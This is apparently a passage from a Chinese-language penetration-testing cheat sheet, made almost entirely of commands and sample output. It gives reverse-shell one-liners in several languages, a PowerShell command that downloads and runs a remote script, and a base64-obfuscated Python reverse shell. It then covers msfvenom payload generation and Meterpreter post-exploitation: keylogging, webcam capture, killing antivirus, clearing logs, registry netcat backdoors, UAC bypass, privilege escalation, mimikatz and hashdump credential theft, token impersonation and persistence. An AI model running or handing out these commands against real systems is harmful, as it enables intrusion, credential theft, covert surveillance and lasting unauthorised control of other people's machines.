/tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 1849 | nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999 1850 | ``` 1851 | 1852 | ## java 1853 | 1854 | ``` 1855 | r = Runtime.getRuntime() 1856 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 1857 | p.waitFor() 1858 | ``` 1859 | 1860 | ## lua 1861 | 1862 | ``` 1863 | lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" 1864 | ``` 1865 | 1866 | ## powershell 1867 | 1868 | ``` 1869 | powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444 1870 | ``` 1871 | 1872 | ## 加密shell 1873 | ``` 1874 | mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.100:2333 > /tmp/s; rm /tmp/s 1875 | 1876 | ``` 1877 | 1878 | # msf大全 1879 | 1880 | 1881 | 1882 | https://xz.aliyun.com/t/2536 1883 | 1884 | https://www.freebuf.com/articles/web/270456.html 1885 | 1886 | https://saucer-man.com/information_security/79.html 1887 | 1888 | https://www.anquanke.com/post/id/235631 1889 | 1890 | https://www.anquanke.com/post/id/164525 1891 | 1892 | 1893 | 1894 | ## 安装 1895 | 1896 | 安装 1897 | 1898 | ```bash 1899 | # 安装 1900 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall 1901 | 安装目录 1902 | # /opt/metasploit-framework/embedded/framework/ 1903 | ``` 1904 | 1905 | 安装2 1906 | ``` 1907 | wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run 1908 | chmod +x ./metasploit-latest-linux-x64-installer.run 1909 | ./metasploit-latest-linux-x64-installer.run 1910 | ``` 1911 | 1912 | payload生成 1913 | 1914 | Linux 1915 | 1916 | ```bash 1917 | 反向连接： 1918 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f elf > shell.elf 1919 | 正向连接： 1920 | msfvenom -p linux/x64/meterpreter/bind_tcp LHOST=127.0.0.1 LPORT=808 -f elf > shell.elf 1921 | ``` 1922 | 1923 | Windows 1924 | 1925 | ```bash 1926 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f exe > shell.exe 1927 | ``` 1928 | 1929 | Mac 1930 | 1931 | ```bash 1932 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f macho > shell.macho 1933 | ``` 1934 | 1935 | PHP 1936 | 1937 | ```bash 1938 | msfvenom -p php/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f raw > shell.php 1939 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 1940 | ``` 1941 | 1942 | ASP 1943 | 1944 | ```bash 1945 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f asp > shell.asp 1946 | ``` 1947 | 1948 | JSP 1949 | 1950 | ```bash 1951 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f raw > shell.jsp 1952 | ``` 1953 | 1954 | WAR 1955 | 1956 | ```bash 1957 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f war > shell.war 1958 | ``` 1959 | 1960 | 执行方式：将shell.php放在web目录下，使用浏览器访问，或者使用以下命令执行： 1961 | 1962 | ```bash 1963 | php shell.php 1964 | ``` 1965 | 1966 | 3.脚本shell 1967 | 1968 | Python 1969 | 1970 | ```bash 1971 | msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=808 -f raw > shell.py 1972 | ``` 1973 | 1974 | Bash 1975 | 1976 | ```bash 1977 | msfvenom -p cmd/unix/reverse_bash LHOST=127.0.0.1 LPORT=808 -f raw > shell.sh 1978 | ``` 1979 | 1980 | Perl 1981 | 1982 | ```bash 1983 | msfvenom -p cmd/unix/reverse_perl LHOST=127.0.0.1 LPORT=808 -f raw > shell.pl 1984 | ``` 1985 | 1986 | 执行方式：复制shell.py中的内容在linux命令行下执行： 1987 | 1988 | ``` 1989 | python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" 1990 | ``` 1991 | 1992 | 4.shellcode 1993 | Linux Based Shellcode 1994 | 1995 | ```bash 1996 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f 1997 | ``` 1998 | 1999 | Windows Based Shellcode 2000 | 2001 | ```bash 2002 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f 2003 | ``` 2004 | 2005 | Mac Based Shellcode 2006 | 2007 | ```bash 2008 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f 2009 | ``` 2010 | 2011 | ## Meterpreter基本命令 2012 | 2013 | 首先需要先获取meterpreter： 2014 | 2015 | ```bash 2016 | use exploit/multi/handler 2017 | set payload windows/meterpreter/reverse_tcp 2018 | #set payload linux/x64/meterpreter/reverse_tcp 2019 | set LHOST 0.0.0.0 2020 | set lPORT 6789 2021 | set ExitOnSession false 2022 | exploit -j -z # -j(计划任务下进行攻击，后台) -z(攻击完成不遇会话交互) 2023 | jobs # 查看后台攻击任务 2024 | kill # 停止某后台攻击任务 2025 | sessions -l # (查看会话) 2026 | sessions -i 2 # 选择会话 2027 | sessions -k 2 # 结束会话 2028 | ``` 2029 | 2030 | 如果先获取了cmd，比如利用ms17-010，默认使用的payload返回的就是cmd。这时候我们可以使用`sessions-u 2`来将cmdshell升级成meterpreter。 2031 | 2032 | 获取到了meterpreter，就可以进行后渗透了。 2033 | 2034 | ### 基本系统命令 2035 | 2036 | ```bash 2037 | # 会话管理 2038 | background #将当前会话放置后台 2039 | sessions # 查看会话 2040 | sessions -i # 切换会话 2041 | quit # 关闭当前的会话，返回msf终端 2042 | 2043 | # 系统设置 2044 | sysinfo # 查看目标机系统信息 2045 | idletime # 查看目标机闲置时间 2046 | reboot/shutdown # 重启/关机 2047 | 2048 | # shell 2049 | shell # 获得控制台权限 2050 | irb # 进入ruby终端 2051 | 2052 | # 进程迁移 2053 | getpid # 获取当前进程的pid 2054 | ps # 查看当前活跃进程 2055 | migrate #将Meterpreter会话移植到指定pid值进程中 2056 | kill #杀死进程 2057 | migrate #将Meterpreter会话移植到指定pid值进程中 2058 | 2059 | # 执行文件 2060 | execute #在目标机中执行文件 2061 | execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互 2062 | 2063 | # 摄像头命令 2064 | webcam_list #查看摄像头列表 2065 | webcam_chat # 查看摄像头接口 2066 | webcam_snap #通过摄像头拍照 2067 | webcam_stream #通过摄像头开启视频 2068 | 2069 | # uictl开关键盘/鼠标 2070 | uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 2071 | uictl disable mouse #禁用鼠标 2072 | uictl disable keyboard #禁用键盘 2073 | 2074 | # 远程桌面/截屏 2075 | enumdesktops #查看可用的桌面 2076 | getdesktop #获取当前meterpreter 关联的桌面 2077 | screenshot #截屏 2078 | use espia #或者使用espia模块截屏然后输入screengrab 2079 | run vnc #使用vnc远程桌面连接 2080 | 2081 | # 键盘记录 2082 | keyscan_start #开始键盘记录 2083 | keyscan_dump #导出记录数据 2084 | keyscan_stop #结束键盘记录 2085 | 2086 | # 添加用户，开启远程桌面 2087 | # 开启rdp是通过reg修改注册表；添加用户是调用cmd.exe 通过net user添加；端口转发是利用的portfwd命令 2088 | run post/windows/manage/enable_rdp #开启远程桌面 2089 | run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户 2090 | run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662 2091 | 2092 | # 关闭防病毒软件 2093 | run killav 2094 | run post/windows/manage/killav 2095 | 2096 | # 修改注册表 2097 | reg –h # 注册表命令帮助 2098 | upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc 2099 | reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run #枚举run下的key 2100 | reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值 2101 | reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc #查看键值 2102 | nc -v 192.168.81.162 443 #攻击者连接nc后门 2103 | 2104 | # 清理日志 2105 | clearav #清除windows中的应用程序日志、系统日志、安全日志 2106 | ``` 2107 | 2108 | ### 文件系统命令 2109 | 2110 | ```bash 2111 | cat/ls/cd/rm # 基本命令 2112 | search -f *pass* -d C:\\windows # 搜索文件 -h查看帮助 2113 | getwd/pwd # 获取当前目录 2114 | getlwd/lpwd # 操作攻击者主机查看当前目录 2115 | upload /tmp/hack.txt C:\\lltest # 上传文件 2116 | download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件 2117 | edit c:\\1.txt # 编辑或创建文件没有的话，会新建文件 2118 | mkdir lltest2 # 只能在当前目录下创建文件夹 2119 | rmdir lltest2 # 只能删除当前目录下文件夹 2120 | lcd /tmp # 操作攻击者主机切换目录 2121 | 2122 | # timestomp伪造文件时间戳 2123 | timestomp C:// -h #查看帮助 2124 | timestomp -v C://2.txt #查看时间戳 2125 | timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt 2126 | ``` 2127 | 2128 | ### 网络命令 2129 | 2130 | ```bash 2131 | # 基本 2132 | ipconfig/ifconfig 2133 | netstat –ano 2134 | arp 2135 | getproxy #查看代理信息 2136 | route #查看路由 2137 | 2138 | # portfwd端口转发 2139 | portfwd add -l 6666 -p 3389 -r 127.0.0.1 # 将目标机的3389端口转发到本地6666端口 2140 | rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接，-u 用户名 -p 密码 2141 | 2142 | 2143 | # 添加路由 2144 | 2145 | # 方式一autoroute （deprecated） 2146 | run autoroute –h #查看帮助 2147 | run autoroute -s 192.168.2.0/24 #添加到目标环境网络 2148 | run autoroute –p #查看添加的路由 2149 | 2150 | # 方式二post/multi/manage/autoroute 2151 | run post/multi/manage/autoroute CMD=autoadd #自动添加到目标环境网络 2152 | run post/multi/manage/autoroute CMD=print # 查看添加的路由 2153 | (Specify the autoroute command (Accepted: add, autoadd, print, delete, default)) 2154 | 2155 | # 然后可以利用arp_scanner、portscan等进行存活检测 2156 | run arp_scanner -r 192.168.2.0/24 2157 | run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24 2158 | run auxiliary/scanner/portscan/tcp RHOSTS=192.168.2.0 2159 | 2160 | # autoroute添加完路由后，还可以利用msf自带的模块进行socks代理 2161 | # msf提供了2个模块用来做socks代理。 2162 | # auxiliary/server/socks_proxy 2163 | # use auxiliary/server/socks_unc 2164 | # 先background退出来，然后： 2165 | use auxiliary/server/socks_proxy 2166 | set srvhost 127.0.0.1 2167 | set srvport 1080 2168 | run 2169 | 2170 | # 然后vi /etc/proxychains.conf #添加 socks5 127.0.0.1 1080 2171 | # 最后proxychains 使用Socks5代理访问 2172 | 2173 | # sniffer抓包 2174 | use sniffer 2175 | sniffer_interfaces #查看网卡 2176 | sniffer_start 2 #选择网卡开始抓包 2177 | sniffer_stats 2 #查看状态 2178 | sniffer_dump 2 /tmp/lltest.pcap #导出pcap数据包 2179 | sniffer_stop 2 #停止抓包 2180 | ``` 2181 | 2182 | ### 信息收集 2183 | 2184 | ```bash 2185 | # 信息收集的脚本位于： 2186 | # modules/post/windows/gather 2187 | # modules/post/linux/gather 2188 | # 以下列举一些常用的 2189 | run post/windows/gather/checkvm #是否虚拟机 2190 | run post/linux/gather/checkvm #是否虚拟机 2191 | run post/windows/gather/forensics/enum_drives #查看分区 2192 | run post/windows/gather/enum_applications #获取安装软件信息 2193 | run post/windows/gather/dumplinks #获取最近的文件操作 2194 | run post/windows/gather/enum_ie #获取IE缓存 2195 | run post/windows/gather/enum_chrome #获取Chrome缓存 2196 | run post/windows/gather/enum_patches #补丁信息 2197 | run post/windows/gather/enum_domain #查找定位域控 2198 | run post/windows/gather/enum_logged_on_users #登录过的用户 2199 | ``` 2200 | 2201 | ### 提权 2202 | 2203 | 1.getsystem提权 2204 | getsystem工作原理： 2205 | ①getsystem创建一个新的Windows服务，设置为SYSTEM运行，当它启动时连接到一个命名管道。 2206 | ②getsystem产生一个进程，它创建一个命名管道并等待来自该服务的连接。 2207 | ③Windows服务已启动，导致与命名管道建立连接。 2208 | ④该进程接收连接并调用ImpersonateNamedPipeClient，从而为SYSTEM用户创建模拟令牌。 2209 | 然后用新收集的SYSTEM模拟令牌产生cmd.exe，并且我们有一个SYSTEM特权进程。 2210 | 2211 | ```bash 2212 | getsystem 2213 | ``` 2214 | 2215 | 2.bypassuac 2216 | 用户帐户控制（UAC）是微软在 Windows Vista 以后版本引入的一种安全机制，有助于防止对系统进行未经授权的更改。应用程序和任务可始终在非管理员帐户的安全上下文中运行，除非管理员专门给系统授予管理员级别的访问权限。UAC 可以阻止未经授权的应用程序进行自动安装，并防止无意中更改系统设置。 2217 | 2218 | msf提供了如下几个模块帮助绕过UAC： 2219 | 2220 | ```bash 2221 | msf5 auxiliary(server/socks5) > search bypassuac 2222 | 2223 | Matching Modules 2224 | ================ 2225 | 2226 | # Name Disclosure Date Rank Check Description 2227 | - ---- --------------- ---- ----- ----------- 2228 | 0 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass 2229 | 1 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 2230 | 2 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) 2231 | 3 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) 2232 | 4 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) 2233 | 5 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS 2234 | 6 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) 2235 | 7 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) 2236 | ``` 2237 | 2238 | 使用方法类似，运行后返回一个新的会话，**需要再次执行getsystem获取系统权限** 2239 | 2240 | ```bash 2241 | # 示例 2242 | meterpreter > getuid 2243 | Server username: SAUCERMAN\TideSec 2244 | meterpreter > background 2245 | [*] Backgrounding session 4... 2246 | msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac 2247 | msf5 exploit(windows/local/bypassuac) > set SESSION 4 2248 | SESSION => 4 2249 | msf5 exploit(windows/local/bypassuac) > run 2250 | 2251 | [-] Handler failed to bind to 192.168.81.160:4444:- - 2252 | [-] Handler failed to bind to 0.0.0.0:4444:- - 2253 | [*] UAC is Enabled, checking level... 2254 | [+] UAC is set to Default 2255 | [+] BypassUAC can bypass this setting, continuing... 2256 | [+] Part of Administrators group! Continuing... 2257 | [*] Uploaded the agent to the filesystem.... 2258 | [*] Uploading the bypass UAC executable to the filesystem... 2259 | [*] Meterpreter stager executable 73802 bytes long being uploaded.. 2260 | [*] Sending stage (206403 bytes) to 192.168.81.154 2261 | [*] Meterpreter session 5 opened (192.168.81.160:4444 -> 192.168.81.154:1134) at 2019-06-12 06:31:11 -0700 2262 | [-] Exploit failed [timeout-expired]: Timeout::Error execution expired 2263 | [*] Exploit completed, but no session was created. 2264 | 2265 | # 然后返回新的meterpreter会话，继续执行getsystem本应该会提权成功 2266 | # 然鹅这里失败了 2267 | ``` 2268 | 2269 | 3.内核漏洞提权 2270 | 2271 | 无论是linux还是windows都出过很多高危的漏洞，我们可以利用它们进行权限提升，比如windows系统的ms13-081、ms15-051、ms16-032、ms17-010等，msf也集成了这些漏洞的利用模块。 2272 | 2273 | ```bash 2274 | meterpreter > run post/windows/gather/enum_patches #查看补丁信息 2275 | msf5 > use exploit/windows/local/ms13_053_schlamperei 2276 | msf5 > set SESSION 2 2277 | msf5 > exploit 2278 | 2279 | # 示例 2280 | meterpreter > run post/windows/gather/enum_patches 2281 | 2282 | [+] KB2871997 is missing 2283 | [+] KB2928120 is missing 2284 | [+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86) 2285 | [+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008 2286 | [+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2 2287 | [+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity 2288 | [+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1 2289 | [+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1 2290 | meterpreter > background 2291 | [*] Backgrounding session 4... 2292 | msf5 exploit(windows/local/bypassuac) > search MS13-081 2293 | 2294 | Matching Modules 2295 | ================ 2296 | 2297 | # Name Disclosure Date Rank Check Description 2298 | - ---- --------------- ---- ----- ----------- 2299 | 0 exploit/windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page 2300 | 2301 | 2302 | msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ms13_081_track_popup_menu 2303 | msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 4 2304 | session => 4 2305 | msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit 2306 | 2307 | [!] SESSION may not be compatible with this module. 2308 | [-] Handler failed to bind to 192.168.81.160:4444:- - 2309 | [-] Handler failed to bind to 0.0.0.0:4444:- - 2310 | [-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported 2311 | [*] Exploit completed, but no session was created. 2312 | # 然鹅失败了，摸摸头 2313 | ``` 2314 | 2315 | ### 获取凭证 2316 | 2317 | 在内网环境中，一个管理员可能管理多台服务器，他使用的密码有可能相同或者有规律，如果能够得到密码或者hash，再尝试登录内网其它服务器，可能取得意想不到的效果。 2318 | 2319 | 1.使用mimikatz 2320 | 2321 | ```bash 2322 | load mimikatz #help mimikatz 查看帮助 2323 | wdigest #获取Wdigest密码 2324 | mimikatz_command -f samdump::hashes #执行mimikatz原始命令 2325 | mimikatz_command -f sekurlsa::searchPasswords 2326 | 2327 | # 示例 2328 | meterpreter > load mimikatz 2329 | Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead? 2330 | Success. 2331 | meterpreter > wdigest 2332 | [!] Not currently running as SYSTEM 2333 | [*] Attempting to getprivs ... 2334 | [+] Got SeDebugPrivilege. 2335 | [*] Retrieving wdigest credentials 2336 | wdigest credentials 2337 | =================== 2338 | 2339 | AuthID Package Domain User Password 2340 | ------ ------- ------ ---- -------- 2341 | 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 2342 | 0;996 Negotiate WORKGROUP SAUCERMAN$ 2343 | 0;48748 NTLM 2344 | 0;999 NTLM WORKGROUP SAUCERMAN$ 2345 | 0;476238 NTLM SAUCERMAN TideSec 123456 2346 | 0;476209 NTLM SAUCERMAN TideSec 123456 2347 | 2348 | meterpreter > mimikatz_command -f samdump::hashes 2349 | Ordinateur : saucerman 2350 | BootKey : 691cff33caf49e933be97fcee370256a 2351 | RegOpenKeyEx SAM : (0x00000005) �ݿ� 2352 | Erreur lors de l'exploration du registre 2353 | meterpreter > mimikatz_command -f sekurlsa::searchPasswords 2354 | [0] { TideSec ; SAUCERMAN ; 123456 } 2355 | [1] { TideSec ; SAUCERMAN ; 123456 } 2356 | [2] { SAUCERMAN ; TideSec ; 123456 } 2357 | [3] { SAUCERMAN ; TideSec ; 123456 } 2358 | [4] { TideSec ; SAUCERMAN ; 123456 } 2359 | [5] { TideSec ; SAUCERMAN ; 123456 } 2360 | ``` 2361 | 2362 | 1. 使用meterpreter的run hashdump命令 2363 | 2364 | ```bash 2365 | meterpreter > run hashdump 2366 | 2367 | [!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump. 2368 | [!] Example: run post/windows/gather/smart_hashdump OPTION=value [...] 2369 | [*] Obtaining the boot key... 2370 | [*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a... 2371 | /opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated 2372 | [*] Obtaining the user list and keys... 2373 | [*] Decrypting user keys... 2374 | /opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated 2375 | /opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated 2376 | /opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated 2377 | [*] Dumping password hints... 2378 | 2379 | TideSec:"123456" 2380 | 2381 | [*] Dumping password hashes... 2382 | 2383 | 2384 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 2385 | Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 2386 | TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4::: 2387 | ``` 2388 | 2389 | 3.post/windows/gather/smart_hashdump 2390 | 2391 | 从上面也可以看出官方推荐`post/windows/gather/smart_hashdump` 2392 | 2393 | ```bash 2394 | meterpreter > run post/windows/gather/smart_hashdump 2395 | 2396 | [*] Running module against SAUCERMAN 2397 | [*] Hashes will be saved to the database if one is connected. 2398 | [+] Hashes will be saved in loot in JtR password file format to: 2399 | [*] /home/ubuntu/.msf4/loot/20190612084715_default_192.168.81.154_windows.hashes_439550.txt 2400 | [*] Dumping password hashes... 2401 | [*] Running as SYSTEM extracting hashes from registry 2402 | [*] Obtaining the boot key... 2403 | [*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a... 2404 | [*] Obtaining the user list and keys... 2405 | [*] Decrypting user keys... 2406 | [*] Dumping password hints... 2407 | [+] TideSec:"123456" 2408 | [*] Dumping password hashes... 2409 | [+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 2410 | [+] TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4::: 2411 | ``` 2412 | 2413 | 4.powerdump 2414 | 同 hashdump，但失败了 2415 | 2416 | ```bash 2417 | meterpreter > run powerdump 2418 | [*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes... 2419 | [*] Running PowerDump to extract Username and Password Hashes... 2420 | [*] Uploaded PowerDump as 69921.ps1 to %TEMP%... 2421 | [*] Setting ExecutionPolicy to Unrestricted... 2422 | [*] Dumping the SAM database through PowerShell... 2423 | 2424 | [-] Could not execute powerdump: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified. 2425 | ``` 2426 | 2427 | ### 假冒令牌 2428 | 2429 | 在用户登录windows操作系统时，系统都会给用户分配一个令牌(Token)，当用户访问系统资源时都会使用这个令牌进行身份验证，功能类似于网站的session或者cookie。 2430 | 2431 | msf提供了一个功能模块可以让我们假冒别人的令牌，实现身份切换，如果目标环境是域环境，刚好域管理员登录过我们已经有权限的终端，那么就可以假冒成域管理员的角色。 2432 | 2433 | ```bash 2434 | # 1.incognito假冒令牌 2435 | use incognito #help incognito 查看帮助 2436 | list_tokens -u #查看可用的token 2437 | impersonate_token 'NT AUTHORITY\SYSTEM' #假冒SYSTEM token 2438 | 或者impersonate_token NT\ AUTHORITY\\SYSTEM #不加单引号需使用\\ 2439 | execute -f cmd.exe -i –t # -t 使用假冒的token 执行 2440 | 或者直接shell 2441 | rev2self #返回原始token 2442 | 2443 | # 2.steal_token窃取令牌 2444 | steal_token #从指定进程中窃取token 先ps,找域控进程 2445 | drop_token #删除窃取的token 2446 | ``` 2447 | 2448 | ### 植入后门 2449 | 2450 | Meterpreter仅仅是在内存中驻留的Shellcode，只要目标机器重启就会丧失控制权，下面就介绍如何植入后门，维持控制。 2451 | 2452 | 1.persistence启动项后门 2453 | 2454 | 路径：metasploit/scripts/meterpreter/persistence 2455 | 2456 | 原理是在`C:\Users***\AppData\Local\Temp\`目录下，上传一个vbs脚本，在注册表`HKLM\Software\Microsoft\Windows\CurrentVersion\Run\`加入开机启动项，**很容易被杀软拦截，官方不推荐** 2457 | 2458 | ```bash 2459 | run persistence –h #查看帮助 2460 | run persistence -X -i 5 -p 4444 -r 192.168.81.160 2461 | #-X指定启动的方式为开机自启动，-i反向连接的时间间隔(5s) –r 指定攻击者的ip 2462 | # 示例 2463 | meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.81.160 2464 | 2465 | [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. 2466 | [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] 2467 | [*] Running Persistence Script 2468 | [*] Resource file for cleanup created at /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.4235/SAUCERMAN_20190612.4235.rc 2469 | [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.81.160 LPORT=4444 2470 | [*] Persistent agent script is 99630 bytes long 2471 | [+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs 2472 | [*] Executing script C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs 2473 | [+] Agent executed with PID 3540 2474 | [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua 2475 | [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua 2476 | ``` 2477 | 2478 | 能实现同样功能的脚本还有：exploit/windows/local/persistence 2479 | 2480 | 2.metsvc服务后门 2481 | 2482 | 在C:\Users***\AppData\Local\Temp\目录下，上传一个vbs脚本 2483 | 在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项。**通过服务启动，需要管理员权限，官方不推荐使用，运行失败** 2484 | 2485 | ```bash 2486 | run metsvc –A #自动安装后门 2487 | 2488 | # 示例 2489 | meterpreter > run metsvc –A 2490 | 2491 | [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. 2492 | [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] 2493 | [*] Creating a meterpreter service on port 31337 2494 | [*] Creating a temporary installation directory C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH... 2495 | [*] >> Uploading metsrv.x86.dll... 2496 | [*] >> Uploading metsvc-server.exe... 2497 | [*] >> Uploading metsvc.exe... 2498 | [*] Starting the service... 2499 | Cannot open service manager (0x00000005) 2500 | 2501 | meterpreter > ls 2502 | Listing: C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH 2503 | ======================================================== 2504 | 2505 | Mode Size Type Last modified Name 2506 | ---- ---- ---- ------------- ---- 2507 | 100666/rw-rw-rw- 178688 fil 2019-06-12 06:46:20 -0700 metsrv.dll 2508 | 100777/rwxrwxrwx 45056 fil 2019-06-12 06:46:21 -0700 metsvc-server.exe 2509 | 100777/rwxrwxrwx 61440 fil 2019-06-12 06:46:21 -0700 metsvc.exe 2510 | ``` 2511 | 2512 | 三个文件上传成功，但服务没有启动起来，失败了。使用`-r`参数可卸载服务。 2513 | 2514 | 3.persistence_exe 2515 | 2516 | 再来看看官方推荐的东西吧 2517 | 2518 | ```bash 2519 | meterpreter > info post/windows/manage/persistence_exe 2520 | 2521 | Name: Windows Manage Persistent EXE Payload Installer 2522 | Module: post/windows/manage/persistence_exe 2523 | Platform: Windows 2524 | Arch: 2525 | Rank: Normal 2526 | 2527 | Provided by: 2528 | Merlyn drforbin Cousins 2529 | 2530 | Compatible session types: 2531 | Meterpreter 2532 | 2533 | Basic options: 2534 | Name Current Setting Required Description 2535 | ---- --------------- -------- ----------- 2536 | REXENAME default.exe yes The name to call exe on remote system 2537 | REXEPATH yes The remote executable to upload and execute. 2538 | SESSION yes The session to run this module on. 2539 | STARTUP USER yes Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE) 2540 